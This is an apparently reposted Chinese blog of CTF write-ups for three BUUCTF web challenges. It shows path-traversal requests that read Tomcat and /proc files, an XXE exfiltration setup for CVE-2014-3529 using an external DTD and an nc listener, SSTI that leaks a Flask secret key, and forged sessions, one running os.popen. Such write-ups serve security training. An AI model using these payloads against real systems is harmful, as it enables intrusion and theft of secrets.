栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Java

BUU刷题

Java 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

BUU刷题

[网鼎杯 2020 青龙组]filejava
    任意文件下载CVE-2014-3529

捉包访问

/DownloadServlet?filename=../

泄露路径

下载 web.xml 文件

/DownloadServlet?filename=../../../../../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml

根据类全名下载 UploadServlet.class

/DownloadServlet?filename=../../../../../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/classes/cn/abc/servlet/UploadServlet.class

反编译审计到如下

if (filename.startsWith("excel-") && "xlsx".equals(fileExtName)) {
    try {
        Workbook wb1 = WorkbookFactory.create(in);
        Sheet sheet = wb1.getSheetAt(0);
        System.out.println(sheet.getFirstRowNum());
    } catch (InvalidFormatException var20) {
        System.err.println("poi-ooxml-3.10 has something wrong");
        var20.printStackTrace();
    }
}

CVE-2014-3529 这个洞 https://blog.csdn.net/weixin_35696112/article/details/114658893

新建一个 excel-1.xlsx 文件,改为zip后缀用rar打开,在 [Content_Types].xml 文件的第二行放如下代码


%remote;%int;%send;
]>

把zip后缀改回xlsx后缀

在vps上新建 file.dtd 文件,写入如下代码


">

在 file.dtd 文件所在目录用 python3 -m http.server 8080 开启简易web服务,并用nc监听80端口 nc -lvnp 80

[watevrCTF-2019]Supercalc
    SSTIFlask Session 伪造

测试正常SSTI拦截

code={{7*7}}

1/0 报错

code=1/0

绕过拦截

code=1/0#{{7*7}}

读取Flask Session Key

code=1/0#{{config}}

获得Key

cded826a1e89925035cc05f0907855f7

Flask Session 伪造

encode -s "cded826a1e89925035cc05f0907855f7" -t "{'history': [{'code': '__import__("os").popen("cat flag.txt").read()'}]}"

读取flag

[PASECA2019]honey_shop
    Flask Session 伪造文件下载

文件下载

/download?image=../../../../../../2.png

读取 Flask Key

/download?image=../../../../../../proc/self/environ

值为

OTEBwVi7xLhiMGN0CuG7OQJGXQ58waGjxAKvAiyn

购买flag需要 1338 块,伪造 Session 为 1338 块

encode -s "OTEBwVi7xLhiMGN0CuG7OQJGXQ58waGjxAKvAiyn" -t "{'balance': 1338, 'purchases': []}"

获得 Session

eyJiYWxhbmNlIjoxMzM4LCJwdXJjaGFzZXMiOltdfQ.YgdpRw.8yGtouclpnSb-dalnW2HjNVMdmk

获得 flag

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/736471.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号